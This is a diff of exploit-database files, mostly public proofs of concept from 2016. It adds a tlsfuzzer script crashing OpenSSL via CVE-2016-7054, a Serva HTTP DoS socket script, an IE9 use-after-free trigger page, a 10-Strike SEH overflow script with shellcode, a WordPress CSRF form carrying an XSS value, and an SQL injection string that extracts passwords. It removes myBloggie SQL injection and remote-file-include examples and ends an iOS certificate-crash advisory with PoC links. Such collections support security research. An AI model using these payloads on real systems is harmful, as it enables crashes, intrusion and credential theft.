- Safari Mobile ( go to special crafted link eg https://cert.cx/appleios10/700k.php which will redirect you to CRT file )
|
||||
- other unspecified
|
||||
|
||||
--------------------------------------------------------------------------------------
|
||||
2. Symptoms of memory overflow
|
||||
By appropriate length of the certificate, an attacker can trigger crash of:
|
||||
- profiled
|
||||
- Preferences
|
||||
- other unexpected behaviors
|
||||
|
||||
--------------------------------------------------------------------------------------
|
||||
3. Crash log:
|
||||
- profiled
|
||||
---------------------------------------------------------------
|
||||
{"app_name":"profiled","app_version":"","bug_type":"109","timestamp":"2016-09-20 09:15:09.85 +0200","os_version":"iPhone OS 10.0.1 (14A403)","incident_id":"XXXXXXXXXXXXXX","slice_uuid":"XXXXXXXXXXXXXX","build_version":"","is_first_party":true,"share_with_app_devs":false,"name":"profiled"}
|
||||
Incident Identifier: XXXXXXXXXXXXXX
|
||||
CrashReporter Key: XXXXXXXXXXXXXX
|
||||
Hardware Model: iPhone6,2
|
||||
Process: profiled [1595]
|
||||
Path: /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled
|
||||
Identifier: profiled
|
||||
Version: ???
|
||||
Code Type: ARM-64 (Native)
|
||||
Role: Unspecified
|
||||
Parent Process: launchd [1]
|
||||
Coalition: <none> [253]
|
||||
|
||||
|
||||
Date/Time: 2016-09-20 09:15:09.7892 +0200
|
||||
Launch Time: 2016-09-20 09:15:01.1603 +0200
|
||||
OS Version: iPhone OS 10.0.1 (14A403)
|
||||
Report Version: 104
|
||||
|
||||
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
|
||||
Exception Subtype: KERN_INVALID_ADDRESS at 0x000000016e193ca0
|
||||
Termination Signal: Segmentation fault: 11
|
||||
Termination Reason: Namespace SIGNAL, Code 0xb
|
||||
Terminating Process: exc handler [0]
|
||||
Triggered by Thread: 2
|
||||
|
||||
---------------------------------------------------------------
|
||||
|
||||
- Preferences
|
||||
---------------------------------------------------------------
|
||||
{"app_name":"Preferences","timestamp":"2016-09-20 01:11:44.56 +0200","app_version":"1","slice_uuid":"XXXXXXXXXXX","adam_id":0,"build_version":"1.0","bundleID":"com.apple.Preferences","share_with_app_devs":false,"is_first_party":true,"bug_type":"109","os_version":"iPhone OS 10.0.1 (14A403)","incident_id":"XXXXXXXXXXX","name":"Preferences"}
|
||||
Incident Identifier: XXXXXXXXXXX
|
||||
CrashReporter Key: XXXXXXXXXXX
|
||||
Hardware Model: iPhone6,2
|
||||
Process: Preferences [1517]
|
||||
Path: /Applications/Preferences.app/Preferences
|
||||
Identifier: com.apple.Preferences
|
||||
Version: 1.0 (1)
|
||||
Code Type: ARM-64 (Native)
|
||||
Role: Foreground
|
||||
Parent Process: launchd [1]
|
||||
Coalition: com.apple.Preferences [754]
|
||||
|
||||
|
||||
Date/Time: 2016-09-20 01:11:43.4478 +0200
|
||||
Launch Time: 2016-09-20 01:10:54.3002 +0200
|
||||
OS Version: iPhone OS 10.0.1 (14A403)
|
||||
Report Version: 104
|
||||
|
||||
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
|
||||
Exception Subtype: KERN_INVALID_ADDRESS at 0x000000016fc6df90
|
||||
Termination Signal: Segmentation fault: 11
|
||||
Termination Reason: Namespace SIGNAL, Code 0xb
|
||||
Terminating Process: exc handler [0]
|
||||
Triggered by Thread: 0
|
||||
---------------------------------------------------------------
|
||||
|
||||
|
||||
Logs:
|
||||
==============================
|
||||
Sep 20 20:17:02 xscxsc com.apple.CoreSimulator.SimDevice.27D...8F.launchd_sim[1905] (com.apple.managedconfiguration.profiled[3085]): Service exited due to signal: Segmentation fault: 11
|
||||
Sep 20 20:17:02 xscxsc MobileSafari[2870]: (Error) MC: Queue data for acceptance error. Error: NSError:
|
||||
Desc : Couldn’t communicate with a helper application.
|
||||
Sugg : Try your operation again. If that fails, quit and relaunch the application and try again.
|
||||
Domain : NSCocoaErrorDomain
|
||||
Code : 4097
|
||||
Extra info:
|
||||
{
|
||||
NSDebugDescription = "connection to service named com.apple.managedconfiguration.profiled";
|
||||
}
|
||||
Sep 20 20:17:02 xscxsc profiled[3133]: (Note ) profiled: Service starting...
|
||||
==============================
|
||||
|
||||
--------------------------------------------------------------------------------------
|
||||
4. PoC
|
||||
https://cert.cx/appleios10/300k.php
|
||||
https://cert.cx/appleios10/500k.php
|
||||
https://cert.cx/appleios10/700k.php
|
||||
https://cert.cx/appleios10/900k.php
|
||||
|
||||
or https://cert.cx/appleios10/expl.html
|
||||
|
||||
just click on this link by using Safari.
|
||||
|
||||
EDB Proofs of Concept Mirror:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40906.zip
|
||||
|
||||
--------------------------------------------------------------------------------------
|
||||
5. Safari and sandbox
|
||||
How is possible that safari don't ask user before run 'Preferences' app to start process of importing certificate? Safari automatically start new process without asking user for acceptance of this operation what can be exploited through http redirect to untrusted content.
|
||||
|
||||
--------------------------------------------------------------------------------------
|
||||
|
||||
6. References
|
||||
CAPEC-44: Overflow Binary Resource File
|
||||
https://capec.mitre.org/data/definitions/44.html
|
||||
https://cert.cx/
|
||||
https://cxsecurity.com/
|
||||
|
||||
Best Regards/Pozdrowienia/С наилучшими пожеланиями
|
||||
Maksymilian Arciemowicz
|
||||
|
||||
References:
|
||||
|
||||
https://support.apple.com/HT207422
|
||||
https://support.apple.com/HT207425
|
||||
https://support.apple.com/HT207426
|
||||
https://cert.cx/appleios10/300k.php
|
||||
https://cert.cx/appleios10/500k.php
|
||||
https://cert.cx/appleios10/700k.php
|
||||
https://cert.cx/appleios10/900k.php
|
||||
https://cert.cx/appleios10/expl.html
|
||||
https://capec.mitre.org/data/definitions/44.html
|
123
platforms/linux/dos/40899.py
Executable file
123
platforms/linux/dos/40899.py
Executable file
|
@ -0,0 +1,123 @@
|
|||
# Exploit Title: OpenSSL 1.1.0a & 1.1.0b Heap Overflow Remote DOS vulnerability
|
||||
# Date: 11-12-2016
|
||||
# Software Link: https://www.openssl.org/source/old/1.1.0/
|
||||
# Exploit Author: Silverfox
|
||||
# Contact: http://twitter.com/___Silverfox___
|
||||
# Website: https://www.silverf0x00.com/
|
||||
# CVE: CVE-2016-7054
|
||||
# Category: Denial of Service
|
||||
# Type: Remote
|
||||
# Platform: Multiple
|
||||
|
||||
1. Description
|
||||
|
||||
Remote unauthenticated user can negotiate ChaCha20-Poly1305 cipher suites and send a message of sufficient length with a bad MAC to trigger the vulnerable code to zero out the heap space and force the vulnerable OpenSSL instance to crash.
|
||||
|
||||
https://blog.fortinet.com/2016/11/23/analysis-of-openssl-chacha20-poly1305-heap-buffer-overflow-cve-2016-7054
|
||||
https://www.silverf0x00.com/overview-of-mac-algorithms-fuzzing-tls-and-finally-exploiting-cve-2016-7054-part-1/
|
||||
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
a. Download and compile OpenSSL 1.1.0a or b
|
||||
b. Run OpenSSL with the following switches: ./openssl-1.1.0a/bin/openssl s_server -cipher 'DHE-RSA-CHACHA20-POLY1305' -key cert.key -cert cert.crt -accept 443 -www -tls1_2 -msg
|
||||
c. Download and run the exploit code (Under https://github.com/silverfoxy/tlsfuzzer package run test-cve-2016-7054.py at https://github.com/silverfoxy/tlsfuzzer/blob/master/scripts/test-cve-2016-7054.py)
|
||||
d. OpenSSL Instance crashes causing DOS
|
||||
|
||||
### Exploit Code ###
|
||||
'''
|
||||
* In no event shall the author be liable
|
||||
* for any direct, indirect, incidential, special, exemplary or
|
||||
* consequential damages, including, but not limited to, procurement
|
||||
* of substitute goods or services, loss of use, data or profits or
|
||||
* business interruption, however caused and on any theory of liability,
|
||||
* whether in contract, strict liability, or tort, including negligence
|
||||
* or otherwise, arising in any way out of the use of this software,
|
||||
* even if advised of the possibility of such damage.
|
||||
'''
|
||||
from __future__ import print_function
|
||||
import traceback
|
||||
import sys
|
||||
|
||||
from tlsfuzzer.runner import Runner
|
||||
from tlsfuzzer.messages import Connect, ClientHelloGenerator, \
|
||||
ClientKeyExchangeGenerator, ChangeCipherSpecGenerator, \
|
||||
FinishedGenerator, ApplicationDataGenerator, \
|
||||
fuzz_encrypted_message
|
||||
from tlsfuzzer.expect import ExpectServerHello, ExpectCertificate, \
|
||||
ExpectServerHelloDone, ExpectChangeCipherSpec, ExpectFinished, \
|
||||
ExpectAlert, ExpectClose, ExpectServerKeyExchange
|
||||
|
||||
from tlslite.constants import CipherSuite, AlertLevel, AlertDescription
|
||||
|
||||
def usage() :
|
||||
return 'Usage ./{} Destination_IP Destination_Port'.format(sys.argv[0])
|
||||
|
||||
def main():
|
||||
if len(sys.argv) < 3:
|
||||
print(usage())
|
||||
return -1
|
||||
conversations = {}
|
||||
# 16 chars: POLY1305 tag 128 bit
|
||||
# Tampering one bit suffices to damage the mac
|
||||
# The payload has to be long enough to trigger heap overflow
|
||||
n = 15000
|
||||
fuzzes = [(-1, 1)]
|
||||
for pos, val in fuzzes:
|
||||
conversation = Connect(sys.argv[1], int(sys.argv[2]))
|
||||
node = conversation
|
||||
ciphers = [CipherSuite.TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256]
|
||||
node = node.add_child(ClientHelloGenerator(ciphers))
|
||||
node = node.add_child(ExpectServerHello())
|
||||
node = node.add_child(ExpectCertificate())
|
||||
node = node.add_child(ExpectServerKeyExchange())
|
||||
node = node.add_child(ExpectServerHelloDone())
|
||||
node = node.add_child(ClientKeyExchangeGenerator())
|
||||
node = node.add_child(ChangeCipherSpecGenerator())
|
||||
node = node.add_child(FinishedGenerator())
|
||||
node = node.add_child(ExpectChangeCipherSpec())
|
||||
node = node.add_child(ExpectFinished())
|
||||
node = node.add_child(fuzz_encrypted_message(
|
||||
ApplicationDataGenerator(b"GET / HTTP/1.0\n" + n * b"A" + b"\n\n"), xors={pos:val}))
|
||||
node = node.add_child(ExpectAlert(AlertLevel.fatal,
|
||||
AlertDescription.bad_record_mac))
|
||||
node = node.add_child(ExpectClose())
|
||||
|
||||
conversations["XOR position " + str(pos) + " with " + str(hex(val))] = \
|
||||
conversation
|
||||
|
||||
# run the conversation
|
||||
good = 0
|
||||
bad = 0
|
||||
|
||||
for conversation_name in conversations:
|
||||
conversation = conversations[conversation_name]
|
||||
#print(conversation_name + "...")
|
||||
runner = Runner(conversation)
|
||||
res = True
|
||||
try:
|
||||
runner.run()
|
||||
except:
|
||||
print("Error while processing")
|
||||
print(traceback.format_exc())
|
||||
res = False
|
||||
if res:
|
||||
good+=1
|
||||
print("OK")
|
||||
else:
|
||||
bad+=1
|
||||
|
||||
print("Test end")
|
||||
print("successful: {0}".format(good))
|
||||
print("failed: {0}".format(bad))
|
||||
|
||||
if bad > 0:
|
||||
sys.exit(1)
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
### End of Exploit Code ###
|
||||
|
||||
3. Solution:
|
||||
|
||||
Update OpenSSL to version 1.1.0c or later, versions earlier than 1.1.0a are not affected by this vulnerability.
|
|
@ -1,14 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/15017/info
|
||||
|
||||
myBloggie is prone to an SQL injection vulnerability. This is due to a lack of sanitization of user-supplied input before passing it on to SQL queries.
|
||||
|
||||
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
|
||||
|
||||
<HTML><BODY>
|
||||
<form
|
||||
action="http://www.example.com/myBloggie/index.php?mode=search"
|
||||
method="post" name="search" onsubmit="return
|
||||
checkForm(this)"><center><input type="text"
|
||||
name="keyword" size="12" value="'SQLInjection"> <input
|
||||
type="submit" value="Inject this"></center></form>
|
||||
</BODY></HTML>
|
|
@ -1,12 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/18241/info
|
||||
|
||||
MyBloggie is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
|
||||
|
||||
Update: Conflicting reports indicate that this issue does not exist in MyBloggie. This BID will be updated when more details are available.
|
||||
|
||||
http://www.example.com/blog/admin.php?mybloggie_root_path=[evil script]
|
||||
|
||||
http://www.example.com/blog/scode.php?mybloggie_root_path=[evil script]
|
||||
|
27
platforms/php/webapps/40904.txt
Executable file
27
platforms/php/webapps/40904.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
# Exploit Title: SQL Injection In Smart Guard Network Manager Api
|
||||
# Date: 03/12/2016
|
||||
# Exploit Author: Rahul Raz
|
||||
# Vendor Homepage: http://www.xsinfoways.com/
|
||||
# Software Name: Smart Guard Network Manager
|
||||
# Version: 6.3.2
|
||||
# Tested on: Ubuntu Linux
|
||||
|
||||
Vulnerability type: CWE-89: Improper Neutralization of Special Elements
|
||||
used in an SQL Command ('SQL Injection')
|
||||
|
||||
The menu_id GET parameter on <base url>/view_logs/search_all_history.php in
|
||||
not filtered properly and leads to SQL Injection
|
||||
|
||||
Authentication Required: No
|
||||
|
||||
SQL injec type- error/xpath.
|
||||
|
||||
Any unauthenticated user can inject SQL commands on the <base-url>
|
||||
/view_logs/search_all_history.php?menu_id=-466 and extractvalue(1,(select
|
||||
make_set(511,0,SUBSTRING(password,1,20),1) from
|
||||
login_master limit 0,1 ))-- -
|
||||
|
||||
So an user can fetch admin details and can easily get root on that server
|
||||
if server is SmartGuard 6.0A Revolutions as php runs as user root by
|
||||
default.
|
||||
This this vulnerability can make whole server vulnerable .
|
64
platforms/php/webapps/40908.html
Executable file
64
platforms/php/webapps/40908.html
Executable file
|
@ -0,0 +1,64 @@
|
|||
<!--
|
||||
Details
|
||||
================
|
||||
Software: Multisite Post Duplicator
|
||||
Version: 0.9.5.1
|
||||
Homepage: http://wordpress.org/plugins/multisite-post-duplicator/
|
||||
Advisory report: https://security.dxw.com/advisories/csrf-vulnerability-in-multisite-post-duplicator-could-allow-an-attacker-to-do-almost-anything-an-admin-user-can-do/
|
||||
CVE: Awaiting assignment
|
||||
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)
|
||||
|
||||
Description
|
||||
================
|
||||
CSRF vulnerability in Multisite Post Duplicator could allow an attacker to do almost anything an admin user can do
|
||||
|
||||
Vulnerability
|
||||
================
|
||||
Contains a CSRF vulnerability which can copy content from one site of a multisite installation to another.
|
||||
This could be used to add arbitrary HTML to the front-end of the site (which could be used for defacement, harvesting login credentials from authenticated users, or could be used to do virtually anything a logged-in admin user can do).
|
||||
This could also be used to view content not meant to be published.
|
||||
|
||||
Proof of concept
|
||||
================
|
||||
Some of these values may need adjusting depending on the post IDs, blog IDs, etc.
|
||||
-->
|
||||
|
||||
<form method=\"POST\" action=\"http://localhost/wp-admin/tools.php?page=mpd\">
|
||||
<input type=\"text\" name=\"mpd-post-status\" value=\"draft\">
|
||||
<input type=\"text\" name=\"mdp-prefix\" value=\"<script>alert(1)</script>\">
|
||||
<input type=\"text\" name=\"action\" value=\"add_foobar\">
|
||||
<input type=\"text\" name=\"el0\" value=\"post\">
|
||||
<input type=\"text\" name=\"el1\" value=\"1\">
|
||||
<input type=\"text\" name=\"el2\" value=\"1\">
|
||||
<input type=\"text\" name=\"el3\" value=\"1\">
|
||||
<input type=\"text\" name=\"duplicate-submit\" value=\"Duplicate\">
|
||||
<input type=\"submit\">
|
||||
</form>
|
||||
|
||||
<!--
|
||||
Mitigations
|
||||
================
|
||||
Update to version 1.1.3 or later.
|
||||
|
||||
Disclosure policy
|
||||
================
|
||||
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
|
||||
|
||||
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
|
||||
|
||||
This vulnerability will be published if we do not receive a response to this report with 14 days.
|
||||
|
||||
Timeline
|
||||
================
|
||||
|
||||
2016-11-01: Discovered
|
||||
2016-12-07: Tested version 1.1.3 and found the plugin no longer vulnerable to the attack as described
|
||||
2016-12-09: Advisory published
|
||||
|
||||
|
||||
|
||||
Discovered by dxw:
|
||||
================
|
||||
Tom Adams
|
||||
Please visit security.dxw.com for more information.
|
||||
-->
|
72
platforms/windows/dos/40905.py
Executable file
72
platforms/windows/dos/40905.py
Executable file
|
@ -0,0 +1,72 @@
|
|||
#!/usr/bin/env python
|
||||
#
|
||||
#
|
||||
# Serva 3.0.0 HTTP Server Module Remote Denial of Service Exploit
|
||||
#
|
||||
#
|
||||
# Vendor: Patrick Masotta
|
||||
# Product web page: http://www.vercot.com
|
||||
# Affected version: 3.0.0.1001 (Community, Pro, 32/64bit)
|
||||
#
|
||||
# Summary: Serva is a light (~3 MB), yet powerful Microsoft Windows application.
|
||||
# It was conceived mainly as an Automated PXE Server Solution Accelerator. It bundles
|
||||
# on a single exe all of the underlying server protocols and services required by the
|
||||
# most complex PXE network boot/install scenarios simultaneously delivering Windows and
|
||||
# non-Windows assets to BIOS and UEFI based targets.
|
||||
#
|
||||
# Desc: The vulnerability is caused by the HTML (httpd) module and how it handles TCP requests.
|
||||
# This can be exploited to cause a denial of service attack resulting in application crash.
|
||||
#
|
||||
# ----------------------------------------------------------------------------
|
||||
#
|
||||
# (c1c.4bc): C++ EH exception - code e06d7363 (first chance)
|
||||
# (c1c.4bc): C++ EH exception - code e06d7363 (!!! second chance !!!)
|
||||
# *** WARNING: Unable to verify checksum for C:\Users\lqwrm\Desktop\Serva_Community_32_v3.0.0\Serva32.exe
|
||||
# *** ERROR: Module load completed but symbols could not be loaded for C:\Users\lqwrm\Desktop\Serva_Community_32_v3.0.0\Serva32.exe
|
||||
# eax=03127510 ebx=03127670 ecx=00000003 edx=00000000 esi=03127670 edi=031276a0
|
||||
# eip=74a1c54f esp=03127510 ebp=03127560 iopl=0 nv up ei pl nz ac po nc
|
||||
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212
|
||||
# KERNELBASE!RaiseException+0x58:
|
||||
# 74a1c54f c9 leave
|
||||
# 0:013> kb
|
||||
# # ChildEBP RetAddr Args to Child
|
||||
# 00 03127560 004abaaf e06d7363 00000001 00000003 KERNELBASE!RaiseException+0x58
|
||||
# WARNING: Stack unwind information not available. Following frames may be wrong.
|
||||
# 01 03127598 004cc909 031275b8 005e13e8 6ca23755 Serva32+0xabaaf
|
||||
# 02 03127608 004085d3 0211ecf8 03127670 ffffffff Serva32+0xcc909
|
||||
# 03 0312761c 004089a5 031276a0 fffffffd 00000004 Serva32+0x85d3
|
||||
# 04 0312764c 00408f01 03127670 fffffffd 00000004 Serva32+0x89a5
|
||||
# 05 03127698 00413b38 00000000 0040007a 00000000 Serva32+0x8f01
|
||||
# 06 031277d8 00000000 00000000 00000000 00000000 Serva32+0x13b38
|
||||
#
|
||||
# ----------------------------------------------------------------------------
|
||||
#
|
||||
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
|
||||
#
|
||||
#
|
||||
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
# @zeroscience
|
||||
#
|
||||
#
|
||||
# Advisory ID: ZSL-2016-5378
|
||||
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5378.php
|
||||
#
|
||||
#
|
||||
# 17.11.2016
|
||||
#
|
||||
|
||||
import sys,socket
|
||||
|
||||
if len(sys.argv) < 3:
|
||||
|
||||
print '\nUsage: ' + sys.argv[0] + ' <target> <port>\n'
|
||||
print 'Example: ' + sys.argv[0] + ' 172.19.0.214 80\n'
|
||||
sys.exit(0)
|
||||
|
||||
host = sys.argv[1]
|
||||
port = int(sys.argv[2])
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
connect = s.connect((host, port))
|
||||
s.settimeout(251)
|
||||
s.send('z')
|
||||
s.close
|
47
platforms/windows/dos/40907.html
Executable file
47
platforms/windows/dos/40907.html
Executable file
|
@ -0,0 +1,47 @@
|
|||
<!--
|
||||
Source: http://blog.skylined.nl/20161212001.html
|
||||
|
||||
Synopsis
|
||||
A specially crafted web-page can trigger a use-after-free vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
|
||||
|
||||
Known affected software and attack vectors
|
||||
Microsoft Internet Explorer 9
|
||||
An attacker would need to get a target user to open a specially crafted web-page. Disabling JavaScript should prevent an attacker from triggering the vulnerable code path.
|
||||
Details
|
||||
This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. EIP revealed that this was a use-after-free vulnerability. I have included a number of reports created using a predecessor of BugId below.
|
||||
|
||||
Repro.html:
|
||||
-->
|
||||
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" >
|
||||
<script>
|
||||
function go() {
|
||||
document.execCommand('SelectAll');
|
||||
document.execCommand('superscript');
|
||||
setTimeout(function() {
|
||||
oSupElement=document.getElementsByTagName('sup')[0];
|
||||
oSupElement.swapNode(document.documentElement);
|
||||
}, 0);
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body onload="go()">
|
||||
<address></address>
|
||||
<fieldset></fieldset>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<!--
|
||||
Time-line
|
||||
27 September 2012: This vulnerability was found through fuzzing.
|
||||
3 December 2012: This vulnerability was submitted to EIP.
|
||||
10 December 2012: This vulnerability was rejected by EIP.
|
||||
12 December 2012: This vulnerability was submitted to ZDI.
|
||||
25 January 2013: This vulnerability was acquired by ZDI.
|
||||
15 February 2013: This vulnerability was disclosed to Microsoft by ZDI.
|
||||
27 June 2013: This vulnerability was address by Microsoft in MS13-047.
|
||||
12 December 2016: Details of this vulnerability are released.
|
||||
-->
|
32
platforms/windows/local/40903.py
Executable file
32
platforms/windows/local/40903.py
Executable file
|
@ -0,0 +1,32 @@
|
|||
#!python
|
||||
#####################################################################################
|
||||
# Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit
|
||||
# Date: 2016-12-10
|
||||
# Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml
|
||||
# Download: https://www.10-strike.com/network-file-search/network-file-search-pro.exe
|
||||
# Tested on: Win7 SP1
|
||||
# Author: malwrforensics
|
||||
# Details: Help->Enter registration code... and paste the text from poc.txt
|
||||
#####################################################################################
|
||||
|
||||
def write_poc(fname, buffer):
|
||||
fhandle = open(fname , 'wb')
|
||||
fhandle.write(buffer)
|
||||
fhandle.close()
|
||||
|
||||
fname="poc.txt"
|
||||
buf = '\x41' * 0xfe0
|
||||
|
||||
#########################
|
||||
# Shellcode
|
||||
# MessageBox ad infinitum
|
||||
#########################
|
||||
shellcode = ("\x68\x24\x3F\x30\x41\x58\x35\x70\x41\x70"
|
||||
"\x41\x50\x59\x68\x41\x41\x41\x41\x58\x35"
|
||||
"\x41\x41\x41\x41\x50\x50\x50\x50\x51\xC3")
|
||||
|
||||
junk = '\x41' * 0x5e
|
||||
jmp = '\xeb\x82\x41\x41'
|
||||
nseh = '\xec\x14\x40\x00'
|
||||
buffer = buf + shellcode + junk + jmp + nseh
|
||||
write_poc(fname, buffer)
|
Loading…
Add table
Reference in a new issue